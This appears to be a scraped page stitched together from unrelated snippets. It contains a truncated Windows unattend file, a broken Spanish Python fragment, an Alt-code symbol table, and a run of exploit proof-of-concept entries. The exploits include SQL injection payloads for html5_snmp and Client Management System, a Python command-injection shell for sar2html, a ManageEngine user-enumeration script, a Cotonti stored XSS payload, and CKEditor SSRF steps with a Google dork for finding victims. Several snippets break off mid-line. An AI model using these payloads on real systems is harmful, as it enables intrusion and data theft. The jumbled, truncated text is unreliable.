CASTILLO PR

  <?xml version="1.0" encoding="utf-8"?> <unattend xmlns="urn:schemas-microsoft-com:unattend"> <settings pass="oobeSystem"> <component name="Microsoft-Windows-Deployment" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <Reseal> <Mode>OOBE</Mode> </Reseal> </component> <component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <OOBE> <HideO

  # Exploit Title: html5_snmp 1.11 - 'Router_ID' SQL Injection # Date: 2019-11-01 # Exploit Author: Cakes # Vendor Homepage: https://github.com/lolypop55/html5_snmp # Software Link: https://github.com/lolypop55/html5_snmp.git # Version: 1.11 # Tested on: CentOS 7 # CVE: N/A # PoC for error, time, boolean and Union based SQL Injection # Parameter: Router_ID (POST) # Type: error-based # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) # Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Payload: Router_ID=123' AND (SELECT 9724 FROM(SELECT COUNT(*),CONCAT(0x716a7a7071,(SELECT (ELT(9724=9724,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'aJYp'='aJYp&Router_Name=123&Router_IP=123&String=123&Remark=123&Submit=

  # Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution # Date: 27-12-2020 # Exploit Author: Musyoka Ian # Vendor Homepage:https://github.com/cemtan/sar2html # Software Link: https://sourceforge.net/projects/sar2html/ # Version: 3.2.1 # Tested on: Ubuntu 18.04.1 #!/usr/bin/env python3 import requests import re from cmd import Cmd url = input ( "Enter The url => " ) class Terminal ( Cmd ) : prompt = "Command => " def default ( self , args ) : exploiter ( args ) def exploiter ( cmd ) : global url sess = requests . session ( ) output = sess . get ( f "{url}/index.php?plot=;{cmd}" ) try : out = re . findall ( "<option value=(.*?)>" , output . text ) except : print ( "Error!!" ) for ouut in out : if "There is no defined host..." not in ouut : if "null selected" not i

  # Exploit Title: Zoho ManageEngine ServiceDesk Plus MSP 9.4 - User Enumeration # Date: 17/06/2021 # Exploit Author: Ricardo Ruiz (@ricardojoserf) # CVE: CVE-2021-31159 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31159) # Vendor Homepage: https://www.manageengine.com # Vendor Confirmation: https://www.manageengine.com/products/service-desk-msp/readme.html#10519 # Version: Previous to build 10519 # Tested on: Zoho ManageEngine ServiceDesk Plus 9.4 # Example: python3 exploit.py -t http://example.com/ -d DOMAIN -u USERSFILE [-o OUTPUTFILE] # Repository (for updates and fixing bugs): https://github.com/ricardojoserf/CVE-2021-31159 import argparse import requests import urllib3 urllib3 . disable_warnings ( urllib3 . exceptions . InsecureRequestWarning ) def get_args ( ) : parser = argparse . ArgumentParser ( ) parser . add_argument ( '-d' , '--domain' , required = True , action = 'store' , help = 'Domain to attack' )

algoritmos phyton con sus inicios con varias variables y terminos facil de enteder print : (´´ 1 + 9 ´´)  input x = ( 10 )

  # Exploit Title: Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting # Date: 2021-15-06 # Exploit Author: Fatih İLGİN # Vendor Homepage: cotonti.com # Vulnerable Software: https://www.cotonti.com/download/siena_0919 # Affected Version: 0.9.19 # Tested on: Windows 10 # Vulnerable Parameter Type: POST # Vulnerable Parameter: maintitle # Attack Pattern: "><img src=1 href=1 onerror="javascript:alert(1)"></img> # Description 1) Entering the Admin Panel (vulnerableapplication.com/cotonti/admin.php) 2) Then go to Configuration tab and set payload ("><img src=1 href=1 onerror="javascript:alert(1)"></img>) for Site title param 3) Then click Update button 4) In the end, Go to home page then shown triggered vulnerability # Proof of Concepts Request; POST /cotonti/admin.php?m=config&n=edit&o=core&p=title&a=update HTTP/1.1 Host: vulnerableapplication.com User-Agent: Mozilla/5.0

  # Exploit Title: Client Management System 1.1 - 'Search' SQL Injection # Date: 14 June 2021 # Exploit Author: BHAVESH KAUL # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/ # Version: 1.1 # Tested on: Server: XAMPP # Description # Client Management System 1.1 is vulnerable to SQL Injection in the admin panel 'search invoices' field because of insufficient user supplied data sanitization. # Proof of Concept (PoC) : Exploit # 1) Goto: http://localhost/clientms/admin/index.php 2) Login as admin using test credentials: admin/Test@123 3) Goto: http://localhost/clientms/admin/search-invoices.php 4) Enter the following payload in the search field: ' OR 'x'='x 5) All results are showed instead of none ==> SQL Injection success

  # Exploit Title: CKEditor 3 - Server-Side Request Forgery (SSRF) # Google Dorks : inurl /editor/filemanager/connectors/uploadtest.html # Date: 12-6-2021 # Exploit Author: Blackangel # Software Link: https://ckeditor.com/ # Version:all version under 4 (1,2,3) # Tested on: windows 7 Steps of Exploit:- 1-using google dorks inurl /editor/filemanager/connectors/uploadtest.html 2-after going to vulnerable page you will find filed “Custom Uploader URL: ” 3-right click then choose inspect element, click on pick an element from the page , select field Custom Uploader URL: 4-in elements “<input id=”txtCustomUrl” style=”WIDTH: 100%; BACKGROUND-COLOR: #dcdcdc” disabled=”” type=”text”>” delete disabled=”” 5-now you can put url start with any protocal 6-send it to the server as you see website that you have entered link is appear into page . what this mean??!!1 you send request to server using vulnerable website you can said i used it as proxy hackers >&

  The Backstory

  Símbolo Alt+abcd Símbolo Alt+abcd ☺ Alt- 1 ☻ Alt- 2 ♥ Alt- 3 ♦ Alt- 4 ♣ Alt- 5 ♠ Alt- 6 ● Alt- 7 ◘ Alt- 8 ○ Alt- 9 ◙ Alt- 10 ♂ Alt- 11 ♀ Alt- 12 ♪ Alt- 13 ♫ Alt- 14 ☼ Alt- 15 ► Alt- 16 ◄ Alt- 17 ↕ Alt- 18 ‼ Alt- 19 ¶ Alt- 20 § Alt- 21 ▬ Alt- 22 ↨ Alt- 23 ↑ Alt- 24 ↓ Alt- 25 → Alt- 26 ← Alt- 27 ∟ Alt- 28 ↔ Alt- 29 ▲ Alt- 30 ▼ Alt- 31 espacio Alt- 32 ! Alt- 33 " Alt- 34 # Alt- 35 $ Alt- 36 % Alt- 37 & Alt- 38 ' Alt- 39 ( Alt- 40 ) Alt- 41 * Alt- 42 + Alt- 43 , Alt- 44 - Alt- 45 . Alt- 46 / Alt- 47 0 Alt- 48 1 Alt- 49 2 Alt- 50 3 Alt- 51 4 Alt- 52 5 Alt- 53 6 Alt- 54 7 Alt- 55 8 Alt- 56 9 Alt- 57 : Alt- 58 ; Alt- 59 < Alt- 60 = Alt- 61 > Alt- 62 ? Alt- 63 @ Alt- 64 A Alt- 65 B Alt- 66 C Alt- 67 D Alt- 68 E Alt- 69 F Alt- 70 G Alt- 71 H Alt- 72 I Alt- 73 J Alt- 74 K Alt- 75 L Alt- 76 M Alt- 77 N Alt- 78 O Alt- 79 P Alt- 80 Q Alt- 81 R Alt- 82 S Alt- 83 T Alt- 84 U Alt- 85 V Alt- 86 W Alt- 87 X Alt- 88 Y Alt- 89 Z Alt- 90 [ Alt- 91 \ Alt- 92 ] Alt- 93 ^ Alt- 94 _ Alt- 9